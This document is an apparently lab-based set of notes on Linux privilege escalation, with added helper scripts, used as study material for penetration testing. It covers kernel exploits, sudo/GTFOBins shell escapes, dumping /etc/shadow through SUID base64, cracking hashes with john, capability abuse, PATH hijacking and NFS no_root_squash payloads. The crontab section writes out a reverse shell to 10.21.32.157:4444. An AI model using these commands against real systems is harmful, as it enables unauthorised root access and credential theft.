LineKernel
Abdelrahman Ali Abdelaziz

Privilege escalation occurs when a user exploits a vulnerability or misconfiguration to act as another account on the system. With that account's rights they can read additional files and, if the account is root, execute administrative commands.
There are two types of privilege escalation:
1. Vertical privilege escalation: a low-privileged user gains the rights of a higher-privileged account, typically root.
2. Horizontal privilege escalation: a user gains access to another account at the same privilege level, for example another ordinary user's files or shell.
Enumeration
The hostname command returns the hostname of the target machine:
hostname
or
uname -n

To get the Linux kernel version use uname -r:
uname -r

Python version (many exploits and reverse shells depend on it):
python -V

Distribution and release:
cat /etc/issue

Initial Access
The kernel is the central program of an operating system and has full control over every part of the system. It always stays resident in memory and mediates between hardware and software. It is written in a low-level language, usually C, so memory-safety bugs in it are found and exploited with binary exploitation techniques.
To find a proof-of-concept for the running kernel, first record the exact version:
cat /proc/version
uname -a
then search for it:
searchsploit "Linux Kernel <version>"
or in Google: site:exploit-db.com "Linux kernel <version>"
OK, I will search for the vulnerable kernel version.
I found CVE-2015-1328
Ubuntu 14.04 - Linux ubuntu 3.13.0-24-generic #46-Ubuntu x86_64

Compile the PoC on the target if it has gcc; otherwise compile it on a machine with the same architecture (use -static so it does not depend on the target's libraries) and copy the binary over:
gcc exploit.c -o exploit
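As an added example (not part of the original notes), the enumeration output above can be turned into searchsploit queries automatically. Kernel exploits are indexed by the major.minor version ("Linux Kernel 3.13"), distribution-specific ones by the release from /etc/issue ("Ubuntu 14.04"), so both terms are derived. The uname and issue strings fed in at the bottom are constructed to match the target shown in the notes; searchsploit is only invoked if it is installed, otherwise the commands to run by hand are printed.

```shell
#!/bin/sh
# Added example: derive searchsploit queries from `uname -r` and /etc/issue.
# Not from the original notes; the input strings below are constructed.

# kernel_term "3.13.0-24-generic" -> "Linux Kernel 3.13"
# Exploit-DB titles use major.minor, so the patch level and build suffix
# (".0-24-generic") are dropped.
kernel_term() {
    printf 'Linux Kernel %s\n' "$(printf '%s' "$1" | cut -d. -f1,2)"
}

# distro_term "Ubuntu 14.04.1 LTS \n \l" -> "Ubuntu 14.04"
# First word is the distribution, second is the release; keep major.minor.
distro_term() {
    printf '%s\n' "$1" | awk '{ split($2, v, "."); print $1 " " v[1] "." v[2] }'
}

# search_exploits UNAME_R ISSUE_LINE: run both queries through searchsploit
# when it is available (attacker box), otherwise print them to run by hand.
search_exploits() {
    k=$(kernel_term "$1")
    d=$(distro_term "$2")
    for q in "$k" "$d"; do
        if command -v searchsploit >/dev/null 2>&1; then
            searchsploit "$q" "privilege escalation"
        else
            printf 'searchsploit "%s" "privilege escalation"\n' "$q"
        fi
    done
}

# Constructed values matching the target shown in the notes.
# On a live box use: search_exploits "$(uname -r)" "$(head -1 /etc/issue)"
search_exploits "3.13.0-24-generic" "Ubuntu 14.04.1 LTS \n \l"
```

Searching by major.minor is deliberate: a query with the full "3.13.0-24-generic" string finds nothing, while "Linux Kernel 3.13" returns the overlayfs entry that the notes go on to use.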

Privilege Escalation: sudo
Programs that the user can run with sudo

Running sudo -l lists every command the current user may run through sudo and whether a password is required:
sudo -l
User karen may run the following commands on ip-10-10-202-96:
(ALL) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /usr/bin/less
(ALL) NOPASSWD: /usr/bin/nano
Each of these runs as root, so a file karen cannot normally read becomes readable:
sudo less flag2.txt

To get a password hash (Frank's, in this case) read the shadow file the same way:
sudo less /etc/shadow
less also has a shell escape: typing !/bin/sh at its prompt gives a root shell, and find and nano have equivalent escapes (see GTFOBins).
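As an added example (not from the original notes), the following script parses sudo -l output and prints, for each NOPASSWD binary, the GTFOBins shell escape that turns it into a root shell. The sample output is constructed from the sudo -l listing above, with one extra line, (root) /usr/bin/id, added to show that entries requiring a password are ignored. On a real host replace the sample with the output of sudo -l.

```shell
#!/bin/sh
# Added example: list NOPASSWD sudo binaries and the matching shell escape.
# Not from the original notes; the sudo -l text below is a constructed sample.

SAMPLE_SUDO_L='Matching Defaults entries for karen on ip-10-10-202-96:
    env_reset, mail_badpass

User karen may run the following commands on ip-10-10-202-96:
    (ALL) NOPASSWD: /usr/bin/find
    (ALL) NOPASSWD: /usr/bin/less
    (ALL) NOPASSWD: /usr/bin/nano
    (root) /usr/bin/id'

# nopasswd_binaries: read sudo -l output on stdin, print the absolute path
# that follows each "NOPASSWD:" (the first word after the tag is the binary,
# anything after it would be fixed arguments).
nopasswd_binaries() {
    grep 'NOPASSWD:' | sed 's/.*NOPASSWD:[[:space:]]*//' | awk '{print $1}'
}

# escape_hint PATH: the GTFOBins sudo escape for the three binaries in the
# notes; anything else is left for a manual GTFOBins lookup.
escape_hint() {
    case "$(basename "$1")" in
        find) printf 'sudo %s . -exec /bin/sh \\; -quit\n' "$1" ;;
        less) printf 'sudo %s /etc/profile, then type !/bin/sh at the less prompt\n' "$1" ;;
        nano) printf 'sudo %s, then Ctrl-R Ctrl-X and run: reset; sh 1>&0 2>&0\n' "$1" ;;
        *)    printf 'check GTFOBins for %s\n' "$1" ;;
    esac
}

# On a live host: sudo -l 2>/dev/null | nopasswd_binaries | while read ...
printf '%s\n' "$SAMPLE_SUDO_L" | nopasswd_binaries | while read -r bin; do
    printf '%s -> %s\n' "$bin" "$(escape_hint "$bin")"
done
```

The parser deliberately keys on the NOPASSWD tag: a binary listed with (root) but without it still needs karen's password, which is the one thing a foothold usually does not have.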


Privilege Escalation: SUID

A SUID binary runs with the permissions of its owner instead of the caller, so a root-owned SUID binary that reads, writes or executes arbitrary files leads to privilege escalation. List them with:
find / -type f -perm -04000 -ls 2>/dev/null

I searched on Google to find the privesc using base64.

With base64 set SUID the file is read as root, so any file can be dumped (LFILE is the file to read):
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode

unshadow
Save /etc/passwd as pass.txt and the dumped shadow file as shadow.txt, combine them and crack the hashes with John:
unshadow pass.txt shadow.txt > passshadow.txt
john passshadow.txt


Limited capabilities
Remember
Capabilities split root's privileges into separate units that can be granted to a single file. A file carrying cap_setuid can switch its uid to 0, which is as good as SUID root, even though find -perm -04000 will not list it.
We search for this flaw using getcap:
getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
cap_net_raw on ping and mtr-packet is normal; cap_setuid on a copy of vim in a home directory is not.
I searched on Google to find the privesc using capabilities.
Run the copy that carries the capability (not the system vim); it must have been built with python3 support for :py3 to work:
/home/karen/vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
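The two listings above (find -perm -04000 for SUID files and getcap -r for capabilities) are long on a real host, so as an added example (not from the original notes) here is a triage script for both: it drops SUID binaries that belong to a stock install and prints only capability entries that grant root-equivalent power. The SUID baseline is an assumption tuned for Ubuntu and should be adjusted per distribution; the getcap lines are those from the notes, the SUID list is a constructed sample. Both the older "path = caps" getcap format shown in the notes and the newer "path caps" format are parsed.

```shell
#!/bin/sh
# Added example: triage SUID and capability enumeration output.
# Not from the original notes; samples are constructed, baseline is assumed.

# SUID binaries that ship on a stock Ubuntu and are not worth a second look.
# (Assumed baseline; tune it for the target distribution.)
SUID_BASELINE='/usr/bin/passwd /usr/bin/sudo /usr/bin/su /usr/bin/mount /usr/bin/umount /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/newgrp /bin/ping'

# Capabilities that give root-equivalent power to whoever runs the file.
CAP_DANGEROUS='cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner'

# suid_unusual: read SUID paths on stdin, print those not in the baseline.
# Live usage: find / -type f -perm -04000 2>/dev/null | suid_unusual
suid_unusual() {
    while read -r path; do
        case " $SUID_BASELINE " in
            *" $path "*) ;;                 # expected on a stock system, skip
            *) printf '%s\n' "$path" ;;
        esac
    done
}

# caps_dangerous: read getcap lines on stdin and print "path cap" for every
# capability in CAP_DANGEROUS. Old libcap prints "path = cap_a,cap_b+ep",
# new libcap prints "path cap_a,cap_b=ep"; both are handled.
# Live usage: getcap -r / 2>/dev/null | caps_dangerous
caps_dangerous() {
    while read -r path rest; do
        rest=${rest#= }                                   # drop the old-format "= "
        caplist=$(printf '%s' "$rest" | sed 's/[+=].*//' | tr ',' ' ')
        for cap in $caplist; do
            case " $CAP_DANGEROUS " in
                *" $cap "*) printf '%s %s\n' "$path" "$cap" ;;
            esac
        done
    done
}

# Constructed SUID sample; the getcap sample is the listing from the notes.
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/base64
/usr/bin/mount'
SAMPLE_CAPS='/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep'

echo "unusual SUID binaries:"
printf '%s\n' "$SAMPLE_SUID" | suid_unusual
echo "files with dangerous capabilities:"
printf '%s\n' "$SAMPLE_CAPS" | caps_dangerous
```

Anything the SUID filter leaves behind goes to GTFOBins, which is how the notes arrived at the base64 trick; for capabilities, cap_setuid and cap_setgid are the direct wins, while cap_dac_read_search and cap_dac_override give arbitrary file read and write, which is usually enough via /etc/shadow or /etc/passwd.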

crontab
Cron is used to schedule jobs in Linux. Jobs in the system crontab run as the user named on the line, usually root.
First, check the crontab config:
cat /etc/crontab
Then check every script it references: whether it exists, who owns it, and whether we can write to it.

We first check /karen/backup.sh.
Since we have write permission on /karen/backup.sh, we replace its contents with a reverse shell:
#!/bin/bash
bash -i >& /dev/tcp/10.21.32.157/4444 0>&1
chmod 777 backup.sh
# Start the listener on the attacker machine before the job fires
nc -nvlp 4444

When the cron job runs, the root shell lands on the listener. From there, dump and crack the hashes as before:
unshadow pass.txt shadow.txt > passshadow.txt
john passshadow.txt

Privilege Escalation: PATH
This technique needs a root-owned SUID binary that calls some command by bare name (without an absolute path) and a directory we can write to. First find the writable directories:
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

Then place a file with the called command's name in a writable directory and put that directory first in PATH, so the SUID binary runs our file instead of the real command:
export PATH=/tmp:$PATH
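As an added example (not from the original notes), the following demo shows the lookup that the PATH technique abuses. A hypothetical victim script that calls service by bare name stands in for the SUID binary on the target (the notes do not name the binary or the command it calls, so both are assumed); everything lives in a temporary directory and no SUID bit is set, so the demo proves which binary gets executed rather than giving a root shell.

```shell
#!/bin/sh
# Added example: PATH hijack of a program that calls a command by bare name.
# Not from the original notes; the victim script and command name are assumed.

work=$(mktemp -d)

# Hypothetical victim: behaves like a SUID helper that runs "service" without
# an absolute path, which is the flaw the PATH technique depends on.
cat > "$work/victim.sh" <<'EOF'
#!/bin/sh
service --status-all
EOF
chmod +x "$work/victim.sh"

# plant_hijack DIR NAME: drop a fake NAME into DIR. A real attack would copy
# /bin/bash here or spawn a shell; this one only reports that it ran and as whom.
plant_hijack() {
    printf '#!/bin/sh\necho "hijacked: running as $(id -un)"\n' > "$1/$2"
    chmod +x "$1/$2"
}

# resolve_with_path DIR NAME: which NAME the shell would run once DIR is
# prepended to PATH (done in a subshell so the caller's PATH is untouched).
resolve_with_path() (
    PATH="$1:$PATH"
    command -v "$2"
)

plant_hijack "$work" service
echo "service now resolves to: $(resolve_with_path "$work" service)"

# Same as `export PATH=$work:$PATH` before running the SUID binary.
PATH="$work:$PATH" "$work/victim.sh"

# Fix on the victim side: call /usr/sbin/service by absolute path, or reset
# PATH to a fixed value before any exec. sudo's secure_path does the same.
```

With a real SUID root binary the planted file is usually cp /bin/bash with the SUID bit set, or a one-liner that runs bash -p; the resolution step is identical.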

Privilege Escalation: NFS
Exploiting the Network File System protocol
NFS (Network File System) is a protocol that lets a server share directories and files with Linux clients over a network.
cat /etc/exports
Read the /etc/exports file. If a directory is exported with no_root_squash, root on a client keeps uid 0 inside the share, so anything we write there as root is owned by root on the target (root_squash, the default, would map us to nobody).
From the attacker, list the exported shares:
showmount -e <target-ip>

Mount that directory on the attacker machine and, as root, copy into it a compiled payload that abuses SUID (a small C program that calls setuid(0) and execs a shell), give it the SUID bit, and execute it on the victim from the shared folder:
# Attacker, as root
gcc -static payload.c -o payload
mkdir /tmp/pe
mount -o rw <IP>:<SHARED_FOLDER> /tmp/pe
cd /tmp/pe
cp /tmp/payload .
chmod +s payload
# Victim
cd <SHARED_FOLDER>
./payload
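As an added example (not from the original notes), this script reads an exports file and reports every share exported with no_root_squash, additionally marking it WORLD when the client spec is "*" so any host can mount it. The exports file is a constructed sample; on the target run it against /etc/exports, and on the attacker the same client specs appear in showmount -e output.

```shell
#!/bin/sh
# Added example: flag NFS exports that allow the no_root_squash attack above.
# Not from the original notes; the exports file below is a constructed sample.

# risky_exports FILE: print "path client options[ WORLD]" for every export
# carrying no_root_squash. Runs in a subshell with globbing off, because
# export lines contain "*" and "(...)" which must stay literal.
risky_exports() (
    set -f
    grep -Ev '^[[:space:]]*(#|$)' "$1" | while read -r path clients; do
        # Each remaining field is client(opt,opt,...); a client with no
        # parentheses has default options, which means root_squash.
        for spec in $clients; do
            client=${spec%%\(*}
            opts=${spec#*\(}
            opts=${opts%\)}
            case ",$opts," in
                *,no_root_squash,*)
                    scope=""
                    if [ "$client" = "*" ]; then scope=" WORLD"; fi
                    printf '%s %s %s%s\n' "$path" "$client" "$opts" "$scope" ;;
            esac
        done
    done
)

sample=$(mktemp)
cat > "$sample" <<'EOF'
# /etc/exports (constructed sample)
/home/backup  *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/public   10.0.0.0/24(ro,sync,root_squash)
/tmp          10.0.0.5(rw,no_root_squash) 10.0.0.6(rw,root_squash)
EOF

# Live usage: risky_exports /etc/exports
risky_exports "$sample"
```

Only the flagged shares are useful for the SUID-payload attack: the payload has to be owned by root on the target, and with root_squash the file written from the client ends up owned by nobody and the SUID bit buys nothing. The rw option is also needed to write it in the first place.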

Capstone Project
Enumeration
Find the SUID binaries:
find / -type f -perm -04000 -ls 2>/dev/null

unshadow the dumped hashes and crack them with john, then switch to the recovered user:

su missy

Check sudo:
sudo -l

sudo find

sudo find . -exec /bin/sh \; -quit
